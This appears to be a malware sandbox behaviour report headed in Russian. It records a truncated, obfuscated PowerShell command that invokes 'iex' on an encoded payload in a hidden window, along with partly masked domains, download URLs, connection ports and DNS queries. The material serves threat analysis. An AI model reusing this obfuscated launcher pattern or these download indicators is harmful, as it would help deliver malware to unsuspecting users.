Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' &( $pSHome[21]+$psHOmE[30]+'x')( "$(SEt-iTEM 'VaRIAbLe:OFs' '')" +[STRING]( '11@97,122w95w64s123L85@15L18e15A65A74M88,2A64L77,69@74e76L91M15e93w78G65L75@64G66L20s11@105k106L96A69M67@76s15,18@...
- 'do####ghieuqua.com':80
- 'do####ghieuqua.com':443
- 'sy####ycapital.jp':80
- 'sy####ycapital.jp':443
- 'me###ybotui.com':80
- 'me###ybotui.com':443
- 'pk#.goog':80
- 'om###akina.net':80
- http://do####ghieuqua.com/URHdUSPTz9/
- http://sy####ycapital.jp/pHJQHP6/
- http://www.me###ybotui.com/qItjGI/
- http://pk#.goog/gsr1/gsr1.crt
- http://www.om###akina.net/E0Qxi7iVDS/
- 'do####ghieuqua.com':443
- 'sy####ycapital.jp':443
- 'me###ybotui.com':443
- DNS ASK do####ghieuqua.com
- DNS ASK sy####ycapital.jp
- DNS ASK me###ybotui.com
- DNS ASK pk#.goog
- DNS ASK ip##nes.bid
- DNS ASK om###akina.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' &( $pSHome[21]+$psHOmE[30]+'x')( "$(SEt-iTEM 'VaRIAbLe:OFs' '')" +[STRING]( '11@97,122w95w64s123L85@15L18e15A65A74M88,2A64L77,69@74e76L91M15e93w78G65L75@64G66L20s11@105k106L96A69M67@76s15,18@...' (со скрытым окном)